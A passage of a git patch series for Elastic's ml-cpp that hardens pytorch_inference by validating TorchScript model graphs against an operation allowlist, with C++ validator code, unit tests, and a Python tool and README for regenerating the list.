From b961e09e2e8a03f48bcc2cd53c5a225c3e10a59b Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 10:54:03 +1300 Subject: [PATCH 01/30] [ML] Harden pytorch_inference by validating TorchScript model graphs Add a static TorchScript graph validation layer that rejects models containing operations not observed in supported transformer architectures. This reduces the attack surface by ensuring only known-safe operation sets are permitted, complementing the existing Sandbox2/seccomp defenses. New files: - CSupportedOperations: allowlist of 71 ops from 10 reference architectures - CModelGraphValidator: recursive graph walker and validation logic - CModelGraphValidatorTest: 10 unit tests covering pass/fail/edge cases - extract_model_ops.py: developer tool to regenerate the allowlist Relates to elastic/ml-team#1770 Made-with: Cursor --- bin/pytorch_inference/CMakeLists.txt | 2 + bin/pytorch_inference/CModelGraphValidator.cc | 76 +++++++ bin/pytorch_inference/CModelGraphValidator.h | 77 +++++++ bin/pytorch_inference/CSupportedOperations.cc | 106 +++++++++ bin/pytorch_inference/CSupportedOperations.h | 51 +++++ bin/pytorch_inference/Main.cc | 42 ++-- bin/pytorch_inference/unittest/CMakeLists.txt | 1 + .../unittest/CModelGraphValidatorTest.cc | 203 ++++++++++++++++++ dev-tools/extract_model_ops.py | 145 +++++++++++++ 9 files changed, 691 insertions(+), 12 deletions(-) create mode 100644 bin/pytorch_inference/CModelGraphValidator.cc create mode 100644 bin/pytorch_inference/CModelGraphValidator.h create mode 100644 bin/pytorch_inference/CSupportedOperations.cc create mode 100644 bin/pytorch_inference/CSupportedOperations.h create mode 100644 bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc create mode 100755 dev-tools/extract_model_ops.py diff --git a/bin/pytorch_inference/CMakeLists.txt b/bin/pytorch_inference/CMakeLists.txt index 5c6ff6352..5e565caa0 100644 --- a/bin/pytorch_inference/CMakeLists.txt +++ b/bin/pytorch_inference/CMakeLists.txt @@ -35,7 +35,9 @@ ml_add_executable(pytorch_inference CBufferedIStreamAdapter.cc CCmdLineParser.cc CCommandParser.cc + CModelGraphValidator.cc CResultWriter.cc + CSupportedOperations.cc CThreadSettings.cc ) diff --git a/bin/pytorch_inference/CModelGraphValidator.cc b/bin/pytorch_inference/CModelGraphValidator.cc new file mode 100644 index 000000000..dd88cada6 --- /dev/null +++ b/bin/pytorch_inference/CModelGraphValidator.cc @@ -0,0 +1,76 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the following additional limitation. Functionality enabled by the + * files subject to the Elastic License 2.0 may only be used in production when + * invoked by an Elasticsearch process with a license key installed that permits + * use of machine learning features. You may not use this file except in + * compliance with the Elastic License 2.0 and the foregoing additional + * limitation. + */ + +#include "CModelGraphValidator.h" + +#include "CSupportedOperations.h" + +#include + +#include + +namespace ml { +namespace torch { + +CModelGraphValidator::SResult CModelGraphValidator::validate(const ::torch::jit::Module& module) { + + TStringSet observedOps; + collectModuleOps(module, observedOps); + + return validate(observedOps, CSupportedOperations::ALLOWED_OPERATIONS, + CSupportedOperations::FORBIDDEN_OPERATIONS); +} + +CModelGraphValidator::SResult +CModelGraphValidator::validate(const TStringSet& observedOps, + const std::unordered_set& allowedOps, + const std::unordered_set& forbiddenOps) { + + SResult result; + + for (const auto& op : observedOps) { + if (forbiddenOps.contains(op)) { + result.s_IsValid = false; + result.s_ForbiddenOps.push_back(op); + } else if (allowedOps.contains(op) == false) { + result.s_IsValid = false; + result.s_UnrecognisedOps.push_back(op); + } + } + + std::sort(result.s_ForbiddenOps.begin(), result.s_ForbiddenOps.end()); + std::sort(result.s_UnrecognisedOps.begin(), result.s_UnrecognisedOps.end()); + + return result; +} + +void CModelGraphValidator::collectBlockOps(const ::torch::jit::Block& block, TStringSet& ops) { + for (const auto* node : block.nodes()) { + ops.emplace(node->kind().toQualString()); + for (const auto* subBlock : node->blocks()) { + collectBlockOps(*subBlock, ops); + } + } +} + +void CModelGraphValidator::collectModuleOps(const ::torch::jit::Module& module, + TStringSet& ops) { + for (const auto& method : module.get_methods()) { + auto graph = method.graph(); + collectBlockOps(*graph->block(), ops); + } + + for (const auto& child : module.children()) { + collectModuleOps(child, ops); + } +} +} +} diff --git a/bin/pytorch_inference/CModelGraphValidator.h b/bin/pytorch_inference/CModelGraphValidator.h new file mode 100644 index 000000000..8a47dd158 --- /dev/null +++ b/bin/pytorch_inference/CModelGraphValidator.h @@ -0,0 +1,77 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the following additional limitation. Functionality enabled by the + * files subject to the Elastic License 2.0 may only be used in production when + * invoked by an Elasticsearch process with a license key installed that permits + * use of machine learning features. You may not use this file except in + * compliance with the Elastic License 2.0 and the foregoing additional + * limitation. + */ + +#ifndef INCLUDED_ml_torch_CModelGraphValidator_h +#define INCLUDED_ml_torch_CModelGraphValidator_h + +#include + +#include +#include +#include +#include + +namespace ml { +namespace torch { + +//! \brief +//! Validates TorchScript model computation graphs against a set of +//! allowed operations. +//! +//! DESCRIPTION:\n +//! Provides defense-in-depth by statically inspecting the TorchScript +//! graph of a loaded model and rejecting any model that contains +//! operations not present in the allowlist derived from supported +//! transformer architectures. +//! +//! IMPLEMENTATION DECISIONS:\n +//! The validation walks all methods of the module and its submodules +//! recursively, collecting every distinct operation. Any operation +//! that appears in the forbidden set causes immediate rejection. +//! Any operation not in the allowed set is collected and reported. +//! This ensures that even operations buried in helper methods or +//! nested submodules are inspected. +//! +class CModelGraphValidator { +public: + using TStringSet = std::unordered_set; + using TStringVec = std::vector; + + //! Result of validating a model graph. + struct SResult { + bool s_IsValid{true}; + TStringVec s_ForbiddenOps; + TStringVec s_UnrecognisedOps; + }; + +public: + //! Validate the computation graph of the given module against the + //! supported operation allowlist. Recursively inspects all methods + //! across all submodules. + static SResult validate(const ::torch::jit::Module& module); + + //! Validate a pre-collected set of operation names. Useful for + //! unit testing the matching logic without requiring a real model. + static SResult validate(const TStringSet& observedOps, + const std::unordered_set& allowedOps, + const std::unordered_set& forbiddenOps); + +private: + //! Collect all operation names from a block, recursing into sub-blocks. + static void collectBlockOps(const ::torch::jit::Block& block, TStringSet& ops); + + //! Recursively collect ops from all methods of a module and its children. + static void collectModuleOps(const ::torch::jit::Module& module, TStringSet& ops); +}; +} +} + +#endif // INCLUDED_ml_torch_CModelGraphValidator_h diff --git a/bin/pytorch_inference/CSupportedOperations.cc b/bin/pytorch_inference/CSupportedOperations.cc new file mode 100644 index 000000000..09e10c299 --- /dev/null +++ b/bin/pytorch_inference/CSupportedOperations.cc @@ -0,0 +1,106 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the following additional limitation. Functionality enabled by the + * files subject to the Elastic License 2.0 may only be used in production when + * invoked by an Elasticsearch process with a license key installed that permits + * use of machine learning features. You may not use this file except in + * compliance with the Elastic License 2.0 and the foregoing additional + * limitation. + */ + +#include "CSupportedOperations.h" + +namespace ml { +namespace torch { + +using namespace std::string_view_literals; + +const CSupportedOperations::TStringViewSet CSupportedOperations::FORBIDDEN_OPERATIONS = { + "aten::from_file"sv, + "aten::save"sv, +}; + +// Generated by dev-tools/extract_model_ops.py against PyTorch 2.10.0. +// Reference models: bert-base-uncased, roberta-base, distilbert-base-uncased, +// google/electra-small-discriminator, microsoft/mpnet-base, +// microsoft/deberta-base, facebook/bart-base, +// facebook/dpr-ctx_encoder-single-nq-base, google/mobilebert-uncased, +// xlm-roberta-base. +const CSupportedOperations::TStringViewSet CSupportedOperations::ALLOWED_OPERATIONS = { + // aten operations (core tensor computations) + "aten::Int"sv, + "aten::ScalarImplicit"sv, + "aten::__and__"sv, + "aten::abs"sv, + "aten::add"sv, + "aten::add_"sv, + "aten::arange"sv, + "aten::bitwise_not"sv, + "aten::cat"sv, + "aten::chunk"sv, + "aten::clamp"sv, + "aten::contiguous"sv, + "aten::cumsum"sv, + "aten::div"sv, + "aten::div_"sv, + "aten::dropout"sv, + "aten::embedding"sv, + "aten::expand"sv, + "aten::full_like"sv, + "aten::gather"sv, + "aten::ge"sv, + "aten::gelu"sv, + "aten::index"sv, + "aten::layer_norm"sv, + "aten::linear"sv, + "aten::log"sv, + "aten::lt"sv, + "aten::masked_fill"sv, + "aten::matmul"sv, + "aten::mean"sv, + "aten::min"sv, + "aten::mul"sv, + "aten::ne"sv, + "aten::neg"sv, + "aten::new_ones"sv, + "aten::pad"sv, + "aten::permute"sv, + "aten::pow"sv, + "aten::relu"sv, + "aten::repeat"sv, + "aten::reshape"sv, + "aten::rsub"sv, + "aten::scaled_dot_product_attention"sv, + "aten::select"sv, + "aten::size"sv, + "aten::slice"sv, + "aten::softmax"sv, + "aten::sqrt"sv, + "aten::squeeze"sv, + "aten::sub"sv, + "aten::tanh"sv, + "aten::tensor"sv, + "aten::to"sv, + "aten::transpose"sv, + "aten::type_as"sv, + "aten::unsqueeze"sv, + "aten::view"sv, + "aten::where"sv, + "aten::zeros"sv, + // prim operations (TorchScript graph infrastructure) + "prim::Constant"sv, + "prim::DictConstruct"sv, + "prim::GetAttr"sv, + "prim::If"sv, + "prim::ListConstruct"sv, + "prim::ListUnpack"sv, + "prim::NumToTensor"sv, + "prim::TupleConstruct"sv, + "prim::TupleUnpack"sv, + "prim::device"sv, + "prim::max"sv, + "prim::min"sv, +}; +} +} diff --git a/bin/pytorch_inference/CSupportedOperations.h b/bin/pytorch_inference/CSupportedOperations.h new file mode 100644 index 000000000..62912dc57 --- /dev/null +++ b/bin/pytorch_inference/CSupportedOperations.h @@ -0,0 +1,51 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the following additional limitation. Functionality enabled by the + * files subject to the Elastic License 2.0 may only be used in production when + * invoked by an Elasticsearch process with a license key installed that permits + * use of machine learning features. You may not use this file except in + * compliance with the Elastic License 2.0 and the foregoing additional + * limitation. + */ + +#ifndef INCLUDED_ml_torch_CSupportedOperations_h +#define INCLUDED_ml_torch_CSupportedOperations_h + +#include +#include + +namespace ml { +namespace torch { + +//! \brief +//! Flat allowlist of TorchScript operations observed across all +//! supported transformer architectures (BERT, RoBERTa, DistilBERT, +//! ELECTRA, MPNet, DeBERTa, BART, DPR, MobileBERT, XLM-RoBERTa). +//! +//! DESCRIPTION:\n +//! Generated by tracing reference HuggingFace models with +//! dev-tools/extract_model_ops.py and collecting the union of all +//! operations from the inlined forward() computation graphs. +//! +//! IMPLEMENTATION DECISIONS:\n +//! Stored as a compile-time data structure rather than an external +//! config file to avoid runtime loading failures and to keep the +//! security boundary self-contained. The list should be regenerated +//! whenever the set of supported architectures changes or when +//! upgrading the PyTorch version. +//! +class CSupportedOperations { +public: + using TStringViewSet = std::unordered_set; + + //! Operations explicitly forbidden regardless of the allowlist. + static const TStringViewSet FORBIDDEN_OPERATIONS; + + //! Union of all TorchScript operations observed in supported architectures. + static const TStringViewSet ALLOWED_OPERATIONS; +}; +} +} + +#endif // INCLUDED_ml_torch_CSupportedOperations_h diff --git a/bin/pytorch_inference/Main.cc b/bin/pytorch_inference/Main.cc index 00adee1df..61053a583 100644 --- a/bin/pytorch_inference/Main.cc +++ b/bin/pytorch_inference/Main.cc @@ -27,6 +27,7 @@ #include "CBufferedIStreamAdapter.h" #include "CCmdLineParser.h" #include "CCommandParser.h" +#include "CModelGraphValidator.h" #include "CResultWriter.h" #include "CThreadSettings.h" @@ -42,24 +43,41 @@ #include namespace { -// Add more forbidden ops here if needed -const std::unordered_set FORBIDDEN_OPERATIONS = {"aten::from_file", "aten::save"}; - void verifySafeModel(const torch::jit::script::Module& module_) { try { - const auto method = module_.get_method("forward"); - for (const auto graph = method.graph(); const auto& node : graph->nodes()) { - if (const std::string opName = node->kind().toQualString(); - FORBIDDEN_OPERATIONS.contains(opName)) { - HANDLE_FATAL(<< "Loading the inference process failed because it contains forbidden operation: " - << opName); + auto result = ml::torch::CModelGraphValidator::validate(module_); + + if (result.s_ForbiddenOps.empty() == false) { + std::string ops; + for (const auto& op : result.s_ForbiddenOps) { + if (ops.empty() == false) { + ops += ", "; + } + ops += op; + } + HANDLE_FATAL(<< "Model contains forbidden operations: " << ops); + } + + if (result.s_UnrecognisedOps.empty() == false) { + std::string ops; + for (const auto& op : result.s_UnrecognisedOps) { + if (ops.empty() == false) { + ops += ", "; + } + ops += op; } + HANDLE_FATAL(<< "Model graph does not match any supported architecture. " + << "Unrecognised operations: " << ops); } + + if (result.s_IsValid == false) { + HANDLE_FATAL(<< "Model graph validation failed"); + } + + LOG_DEBUG(<< "Model verified: all operations match supported architectures."); } catch (const c10::Error& e) { - LOG_FATAL(<< "Failed to get forward method: " << e.what()); + LOG_FATAL(<< "Model graph validation failed: " << e.what()); } - - LOG_DEBUG(<< "Model verified: no forbidden operations detected."); } } diff --git a/bin/pytorch_inference/unittest/CMakeLists.txt b/bin/pytorch_inference/unittest/CMakeLists.txt index dd5394492..a2e0129c3 100644 --- a/bin/pytorch_inference/unittest/CMakeLists.txt +++ b/bin/pytorch_inference/unittest/CMakeLists.txt @@ -14,6 +14,7 @@ project("ML pytorch_inference unit tests") set (SRCS Main.cc CCommandParserTest.cc + CModelGraphValidatorTest.cc CResultWriterTest.cc CThreadSettingsTest.cc ) diff --git a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc new file mode 100644 index 000000000..2404b50d3 --- /dev/null +++ b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc @@ -0,0 +1,203 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the following additional limitation. Functionality enabled by the + * files subject to the Elastic License 2.0 may only be used in production when + * invoked by an Elasticsearch process with a license key installed that permits + * use of machine learning features. You may not use this file except in + * compliance with the Elastic License 2.0 and the foregoing additional + * limitation. + */ + +#include "../CModelGraphValidator.h" + +#include "../CSupportedOperations.h" + +#include + +#include +#include +#include + +using namespace ml::torch; +using TStringSet = CModelGraphValidator::TStringSet; +using TStringViewSet = std::unordered_set; + +BOOST_AUTO_TEST_SUITE(CModelGraphValidatorTest) + +BOOST_AUTO_TEST_CASE(testAllAllowedOpsPass) { + // A model using only allowed ops should pass validation. + TStringSet observed{"aten::linear", "aten::layer_norm", "aten::gelu", + "aten::embedding", "prim::Constant", "prim::GetAttr"}; + + auto result = CModelGraphValidator::validate( + observed, CSupportedOperations::ALLOWED_OPERATIONS, + CSupportedOperations::FORBIDDEN_OPERATIONS); + + BOOST_REQUIRE(result.s_IsValid); + BOOST_REQUIRE(result.s_ForbiddenOps.empty()); + BOOST_REQUIRE(result.s_UnrecognisedOps.empty()); +} + +BOOST_AUTO_TEST_CASE(testEmptyGraphPasses) { + TStringSet observed; + + auto result = CModelGraphValidator::validate( + observed, CSupportedOperations::ALLOWED_OPERATIONS, + CSupportedOperations::FORBIDDEN_OPERATIONS); + + BOOST_REQUIRE(result.s_IsValid); + BOOST_REQUIRE(result.s_ForbiddenOps.empty()); + BOOST_REQUIRE(result.s_UnrecognisedOps.empty()); +} + +BOOST_AUTO_TEST_CASE(testForbiddenOpsRejected) { + TStringSet observed{"aten::linear", "aten::from_file", "prim::Constant"}; + + auto result = CModelGraphValidator::validate( + observed, CSupportedOperations::ALLOWED_OPERATIONS, + CSupportedOperations::FORBIDDEN_OPERATIONS); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE_EQUAL(1, result.s_ForbiddenOps.size()); + BOOST_REQUIRE_EQUAL("aten::from_file", result.s_ForbiddenOps[0]); + BOOST_REQUIRE(result.s_UnrecognisedOps.empty()); +} + +BOOST_AUTO_TEST_CASE(testMultipleForbiddenOps) { + TStringSet observed{"aten::from_file", "aten::save"}; + + auto result = CModelGraphValidator::validate( + observed, CSupportedOperations::ALLOWED_OPERATIONS, + CSupportedOperations::FORBIDDEN_OPERATIONS); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE_EQUAL(2, result.s_ForbiddenOps.size()); + BOOST_REQUIRE_EQUAL("aten::from_file", result.s_ForbiddenOps[0]); + BOOST_REQUIRE_EQUAL("aten::save", result.s_ForbiddenOps[1]); +} + +BOOST_AUTO_TEST_CASE(testUnrecognisedOpsRejected) { + TStringSet observed{"aten::linear", "custom::evil_op", "prim::Constant"}; + + auto result = CModelGraphValidator::validate( + observed, CSupportedOperations::ALLOWED_OPERATIONS, + CSupportedOperations::FORBIDDEN_OPERATIONS); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE(result.s_ForbiddenOps.empty()); + BOOST_REQUIRE_EQUAL(1, result.s_UnrecognisedOps.size()); + BOOST_REQUIRE_EQUAL("custom::evil_op", result.s_UnrecognisedOps[0]); +} + +BOOST_AUTO_TEST_CASE(testMixedForbiddenAndUnrecognised) { + TStringSet observed{"aten::save", "custom::backdoor", "aten::linear"}; + + auto result = CModelGraphValidator::validate( + observed, CSupportedOperations::ALLOWED_OPERATIONS, + CSupportedOperations::FORBIDDEN_OPERATIONS); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE_EQUAL(1, result.s_ForbiddenOps.size()); + BOOST_REQUIRE_EQUAL("aten::save", result.s_ForbiddenOps[0]); + BOOST_REQUIRE_EQUAL(1, result.s_UnrecognisedOps.size()); + BOOST_REQUIRE_EQUAL("custom::backdoor", result.s_UnrecognisedOps[0]); +} + +BOOST_AUTO_TEST_CASE(testResultsSorted) { + TStringSet observed{"zzz::unknown", "aaa::unknown", "mmm::unknown"}; + + auto result = CModelGraphValidator::validate( + observed, CSupportedOperations::ALLOWED_OPERATIONS, + CSupportedOperations::FORBIDDEN_OPERATIONS); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE_EQUAL(3, result.s_UnrecognisedOps.size()); + BOOST_REQUIRE_EQUAL("aaa::unknown", result.s_UnrecognisedOps[0]); + BOOST_REQUIRE_EQUAL("mmm::unknown", result.s_UnrecognisedOps[1]); + BOOST_REQUIRE_EQUAL("zzz::unknown", result.s_UnrecognisedOps[2]); +} + +BOOST_AUTO_TEST_CASE(testTypicalBertOps) { + // Simulate a realistic BERT-like op set. + TStringSet observed{"aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::div", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::gelu", + "aten::ge", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::masked_fill", + "aten::matmul", + "aten::mul", + "aten::new_ones", + "aten::permute", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::size", + "aten::slice", + "aten::softmax", + "aten::tanh", + "aten::to", + "aten::transpose", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::If", + "prim::ListConstruct", + "prim::NumToTensor", + "prim::TupleConstruct"}; + + auto result = CModelGraphValidator::validate( + observed, CSupportedOperations::ALLOWED_OPERATIONS, + CSupportedOperations::FORBIDDEN_OPERATIONS); + + BOOST_REQUIRE(result.s_IsValid); + BOOST_REQUIRE(result.s_ForbiddenOps.empty()); + BOOST_REQUIRE(result.s_UnrecognisedOps.empty()); +} + +BOOST_AUTO_TEST_CASE(testCustomAllowlistAndForbiddenList) { + // Verify the three-argument overload works with arbitrary lists. + TStringViewSet allowed{"op::a", "op::b", "op::c"}; + TStringViewSet forbidden{"op::bad"}; + TStringSet observed{"op::a", "op::b"}; + + auto result = CModelGraphValidator::validate(observed, allowed, forbidden); + BOOST_REQUIRE(result.s_IsValid); + + observed.emplace("op::bad"); + result = CModelGraphValidator::validate(observed, allowed, forbidden); + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE_EQUAL(1, result.s_ForbiddenOps.size()); + + observed.erase("op::bad"); + observed.emplace("op::unknown"); + result = CModelGraphValidator::validate(observed, allowed, forbidden); + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE_EQUAL(1, result.s_UnrecognisedOps.size()); +} + +BOOST_AUTO_TEST_CASE(testForbiddenOpAlsoInAllowlist) { + // If an op appears in both forbidden and allowed, forbidden takes precedence. + TStringViewSet allowed{"aten::from_file", "aten::linear"}; + TStringViewSet forbidden{"aten::from_file"}; + TStringSet observed{"aten::from_file", "aten::linear"}; + + auto result = CModelGraphValidator::validate(observed, allowed, forbidden); + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE_EQUAL(1, result.s_ForbiddenOps.size()); + BOOST_REQUIRE_EQUAL("aten::from_file", result.s_ForbiddenOps[0]); +} + +BOOST_AUTO_TEST_SUITE_END() diff --git a/dev-tools/extract_model_ops.py b/dev-tools/extract_model_ops.py new file mode 100755 index 000000000..361c8d26a --- /dev/null +++ b/dev-tools/extract_model_ops.py @@ -0,0 +1,145 @@ +#!/usr/bin/env python3 +# +# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +# or more contributor license agreements. Licensed under the Elastic License +# 2.0 and the following additional limitation. Functionality enabled by the +# files subject to the Elastic License 2.0 may only be used in production when +# invoked by an Elasticsearch process with a license key installed that permits +# use of machine learning features. You may not use this file except in +# compliance with the Elastic License 2.0 and the foregoing additional +# limitation. +# +"""Extract TorchScript operation sets from supported HuggingFace transformer architectures. + +This developer tool traces/scripts reference models and collects the set of +TorchScript operations that appear in their forward() computation graphs. +The output is a sorted, de-duplicated union of all operations which can be +used to build the C++ allowlist in CSupportedOperations.h. + +Usage: + python3 dev-tools/extract_model_ops.py [--per-model] [--cpp] + +Flags: + --per-model Print the op set for each model individually. + --cpp Print the union as a C++ initializer list. +""" + +import argparse +import os +import sys +from collections import defaultdict + +import torch +from transformers import AutoConfig, AutoModel, AutoTokenizer + + +REFERENCE_MODELS = { + "bert": "bert-base-uncased", + "roberta": "roberta-base", + "distilbert": "distilbert-base-uncased", + "electra": "google/electra-small-discriminator", + "mpnet": "microsoft/mpnet-base", + "deberta": "microsoft/deberta-base", + "bart": "facebook/bart-base", + "dpr": "facebook/dpr-ctx_encoder-single-nq-base", + "mobilebert": "google/mobilebert-uncased", + "xlm-roberta": "xlm-roberta-base", +} + + +def collect_graph_ops(graph): + """Collect all operation names from a TorchScript graph, including blocks.""" + ops = set() + for node in graph.nodes(): + ops.add(node.kind()) + for block in node.blocks(): + ops.update(collect_graph_ops(block)) + return ops + + +def collect_all_module_ops(module): + """Collect all ops by inlining method calls and walking the flattened graph.""" + forward = module.forward + graph = forward.graph.copy() + torch._C._jit_pass_inline(graph) + return collect_graph_ops(graph) + + +def extract_ops_for_model(model_name: str) -> set[str]: + """Trace a HuggingFace model and return its TorchScript op set.""" + print(f" Loading {model_name}...", file=sys.stderr) + token = os.environ.get("HF_TOKEN") + tokenizer = AutoTokenizer.from_pretrained(model_name, token=token) + config = AutoConfig.from_pretrained(model_name, torchscript=True, token=token) + model = AutoModel.from_pretrained(model_name, config=config, token=token) + model.eval() + + inputs = tokenizer("This is a sample input for graph extraction.", + return_tensors="pt", padding="max_length", + max_length=32, truncation=True) + + input_ids = inputs["input_ids"] + attention_mask = inputs["attention_mask"] + + try: + traced = torch.jit.trace(model, (input_ids, attention_mask), strict=False) + except Exception as e: + print(f" Warning: trace failed for {model_name}: {e}", file=sys.stderr) + print(f" Falling back to torch.jit.script...", file=sys.stderr) + try: + traced = torch.jit.script(model) + except Exception as e2: + print(f" Error: script also failed for {model_name}: {e2}", file=sys.stderr) + return set() + + return collect_all_module_ops(traced) + + +def format_cpp_initializer(ops: set[str]) -> str: + """Format the op set as a C++ initializer list for std::unordered_set.""" + sorted_ops = sorted(ops) + lines = [] + for op in sorted_ops: + lines.append(f' "{op}"sv,') + return "{\n" + "\n".join(lines) + "\n}" + + +def main(): + parser = argparse.ArgumentParser(description=__doc__) + parser.add_argument("--per-model", action="store_true", + help="Print per-model op sets") + parser.add_argument("--cpp", action="store_true", + help="Print union as C++ initializer") + args = parser.parse_args() + + per_model_ops = {} + union_ops = set() + + print("Extracting TorchScript ops from supported architectures...", + file=sys.stderr) + + for arch, model_name in REFERENCE_MODELS.items(): + ops = extract_ops_for_model(model_name) + per_model_ops[arch] = ops + union_ops.update(ops) + print(f" {arch}: {len(ops)} ops", file=sys.stderr) + + print(f"\nTotal union: {len(union_ops)} unique ops", file=sys.stderr) + + if args.per_model: + for arch, ops in sorted(per_model_ops.items()): + print(f"\n=== {arch} ({REFERENCE_MODELS[arch]}) ===") + for op in sorted(ops): + print(f" {op}") + + if args.cpp: + print("\n// C++ initializer for SUPPORTED_OPERATIONS:") + print(format_cpp_initializer(union_ops)) + else: + print("\n// Sorted union of all operations:") + for op in sorted(union_ops): + print(op) + + +if __name__ == "__main__": + main() From 4364e995032fdf3b2655de356dbf19663c8c3408 Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 11:36:20 +1300 Subject: [PATCH 02/30] [ML] Move extract_model_ops to its own subdirectory with README and config - Move script to dev-tools/extract_model_ops/ subdirectory - Extract REFERENCE_MODELS dict to reference_models.json config file - Add requirements.txt for virtual environment setup - Add README.md with setup, usage, and configuration instructions - Update CSupportedOperations path references Made-with: Cursor --- bin/pytorch_inference/CSupportedOperations.cc | 2 +- bin/pytorch_inference/CSupportedOperations.h | 2 +- dev-tools/extract_model_ops/README.md | 76 +++++++++ .../extract_model_ops/extract_model_ops.py | 148 ++++++++++++++++++ .../extract_model_ops/reference_models.json | 12 ++ dev-tools/extract_model_ops/requirements.txt | 2 + 6 files changed, 240 insertions(+), 2 deletions(-) create mode 100644 dev-tools/extract_model_ops/README.md create mode 100644 dev-tools/extract_model_ops/extract_model_ops.py create mode 100644 dev-tools/extract_model_ops/reference_models.json create mode 100644 dev-tools/extract_model_ops/requirements.txt diff --git a/bin/pytorch_inference/CSupportedOperations.cc b/bin/pytorch_inference/CSupportedOperations.cc index 09e10c299..31f567e64 100644 --- a/bin/pytorch_inference/CSupportedOperations.cc +++ b/bin/pytorch_inference/CSupportedOperations.cc @@ -21,7 +21,7 @@ const CSupportedOperations::TStringViewSet CSupportedOperations::FORBIDDEN_OPERA "aten::save"sv, }; -// Generated by dev-tools/extract_model_ops.py against PyTorch 2.10.0. +// Generated by dev-tools/extract_model_ops/extract_model_ops.py against PyTorch 2.10.0. // Reference models: bert-base-uncased, roberta-base, distilbert-base-uncased, // google/electra-small-discriminator, microsoft/mpnet-base, // microsoft/deberta-base, facebook/bart-base, diff --git a/bin/pytorch_inference/CSupportedOperations.h b/bin/pytorch_inference/CSupportedOperations.h index 62912dc57..2c51c5919 100644 --- a/bin/pytorch_inference/CSupportedOperations.h +++ b/bin/pytorch_inference/CSupportedOperations.h @@ -25,7 +25,7 @@ namespace torch { //! //! DESCRIPTION:\n //! Generated by tracing reference HuggingFace models with -//! dev-tools/extract_model_ops.py and collecting the union of all +//! dev-tools/extract_model_ops/extract_model_ops.py and collecting the union of all //! operations from the inlined forward() computation graphs. //! //! IMPLEMENTATION DECISIONS:\n diff --git a/dev-tools/extract_model_ops/README.md b/dev-tools/extract_model_ops/README.md new file mode 100644 index 000000000..73798e03f --- /dev/null +++ b/dev-tools/extract_model_ops/README.md @@ -0,0 +1,76 @@ +# extract\_model\_ops + +Developer tool that extracts TorchScript operation sets from the supported +HuggingFace transformer architectures. The output is used to maintain the +C++ operation allowlist in +`bin/pytorch_inference/CSupportedOperations.cc`. + +## When to run + +Re-run this tool whenever: + +- A new transformer architecture is added to the supported set. +- The PyTorch (libtorch) version used by ml-cpp is upgraded. +- You need to verify which operations a particular model uses. + +## Setup + +Create a Python virtual environment and install the dependencies: + +```bash +cd dev-tools/extract_model_ops +python3 -m venv .venv +source .venv/bin/activate +pip install -r requirements.txt +``` + +If any of the reference models are gated, set a HuggingFace token: + +```bash +export HF_TOKEN="hf_..." +``` + +## Usage + +```bash +# Print the sorted union of all operations (default) +python3 extract_model_ops.py + +# Print a ready-to-paste C++ initializer list +python3 extract_model_ops.py --cpp + +# Also show per-model breakdowns +python3 extract_model_ops.py --per-model --cpp + +# Use a custom config file +python3 extract_model_ops.py --config /path/to/models.json +``` + +## Configuration + +The set of reference models is defined in `reference_models.json`. Each +entry maps a short architecture name to a HuggingFace model identifier: + +```json +{ + "bert": "bert-base-uncased", + "roberta": "roberta-base" +} +``` + +To add a new architecture, append an entry to this file and re-run the +script. Copy the `--cpp` output into `CSupportedOperations.cc`, adding +any new operations to the `ALLOWED_OPERATIONS` set. + +## How it works + +1. Each reference model is loaded via `transformers.AutoModel` with + `torchscript=True` in the config. +2. The model is traced with `torch.jit.trace` using a short dummy input + (falls back to `torch.jit.script` if tracing fails). +3. All method calls in the forward graph are inlined via + `torch._C._jit_pass_inline` so that operations inside submodules + are visible. +4. Every node's operation name (`node.kind()`) is collected, recursing + into sub-blocks (e.g. inside `prim::If` / `prim::Loop` nodes). +5. The union across all models is reported. diff --git a/dev-tools/extract_model_ops/extract_model_ops.py b/dev-tools/extract_model_ops/extract_model_ops.py new file mode 100644 index 000000000..bd12021b3 --- /dev/null +++ b/dev-tools/extract_model_ops/extract_model_ops.py @@ -0,0 +1,148 @@ +#!/usr/bin/env python3 +# +# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +# or more contributor license agreements. Licensed under the Elastic License +# 2.0 and the following additional limitation. Functionality enabled by the +# files subject to the Elastic License 2.0 may only be used in production when +# invoked by an Elasticsearch process with a license key installed that permits +# use of machine learning features. You may not use this file except in +# compliance with the Elastic License 2.0 and the foregoing additional +# limitation. +# +"""Extract TorchScript operation sets from supported HuggingFace transformer architectures. + +This developer tool 